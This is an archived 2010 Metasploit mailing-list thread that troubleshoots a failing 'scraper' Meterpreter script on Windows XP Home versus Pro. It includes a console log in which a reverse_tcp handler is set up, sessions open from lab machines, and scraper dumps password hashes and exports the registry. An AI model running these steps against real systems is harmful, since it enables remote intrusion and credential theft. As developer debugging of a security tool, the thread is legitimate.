Metasploit mailing list archives
Re: Scraper problem
From: Carlos Perez <carlos_perez () darkoperator com>
Date: Mon, 12 Jul 2010 08:26:18 -0400
I was able to replicate the problem on a Home system but not on a Professional system. The first machine is a WinXP SP2 Home and the second a WinXP SP2 Pro.

Matt, could you please open a ticket at http://www.metasploit.com/redmine/projects/framework/issues/new

Thanks,
Carlos

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|

       =[ metasploit v3.4.1-release [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 282 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
       =[ svn r9785 updated today (2010.07.11)

resource (resource/meterpreter_api.rc)> use exploit/multi/handler
resource (resource/meterpreter_api.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (resource/meterpreter_api.rc)> set LHOST 192.168.1.100
LHOST => 192.168.1.100
resource (resource/meterpreter_api.rc)> set ExitOnSession false
ExitOnSession => false
resource (resource/meterpreter_api.rc)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (748032 bytes) to 192.168.1.234
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.234:1038) at Mon Jul 12 08:20:54 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: CARLOS-B357C681\Owner
meterpreter > sysinfo
Computer: CARLOS-B357C681
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run scraper
[*] New session on 192.168.1.234:1038...
[*] Gathering basic system information...
[*] Exception: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: 2
/Users/cperez/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
/Users/cperez/trunk/lib/rex/script/base.rb:83:in `m_exec'
/Users/cperez/trunk/lib/rex/script/base.rb:166:in `run'
/Users/cperez/trunk/lib/rex/script/base.rb:165:in `open'
/Users/cperez/trunk/lib/rex/script/base.rb:165:in `run'
/Users/cperez/trunk/lib/rex/script/base.rb:41:in `run'
/Users/cperez/trunk/lib/rex/post/meterpreter/client.rb:183:in `execute_file'
/Users/cperez/trunk/lib/msf/base/sessions/meterpreter.rb:182:in `execute_script'
/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:348:in `cmd_run'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'
/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:101:in `run_command'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'
/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:67
/Users/cperez/trunk/lib/rex/ui/text/shell.rb:131:in `call'
/Users/cperez/trunk/lib/rex/ui/text/shell.rb:131:in `run'
/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:65:in `interact'
/Users/cperez/trunk/lib/msf/base/sessions/meterpreter.rb:233:in `_interact'
/Users/cperez/trunk/lib/rex/ui/interactive.rb:48:in `interact'
/Users/cperez/trunk/lib/msf/ui/console/command_dispatcher/core.rb:1217:in `cmd_sessions'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'
/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'
/Users/cperez/trunk/lib/rex/ui/text/shell.rb:141:in `run'
./msfconsole:112
meterpreter >
[*] Sending stage (748032 bytes) to 192.168.1.220
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.220:11105) at Mon Jul 12 08:22:10 -0400 2010

meterpreter > background
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > run scraper
[*] New session on 192.168.1.220:11105...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\XulAaohn.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yKjsYnyS.reg)

On Jul 12, 2010, at 6:59 AM, Matt Gardenghi wrote:
> HD, the console is run by root and the target victim is the only user on the machine. That puts him as Administrator.
>
> Carlos, I'll need to test tonight when I get home. I cleaned up the BT4 svn and tried again this morning with the same results. Tonight I'll try to rebuild my stripped down Ubuntu VM and run the old school install procedure instead of the newer installer and see if that makes a difference. It failed on that machine as well.
>
> Matt
>
> On 7/11/2010 10:34 PM, HD Moore wrote:
>> On 7/11/2010 7:37 PM, Carlos Perez wrote:
>>> OK, just tested on Win XP Pro with SP1, SP2 and SP3 with Ruby 1.8.7 and 1.9.1 and I could not replicate the problem. Downloading WinXP Home SP2 right now to test. Please clear your cache and svn up to make sure it is not a cached library while I set up XP Home for the test.
>>
>> Based on the error message (operation failed: 2), my guess is the user account it was run with is a limited user and not an admin.
>>
>> -HD

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework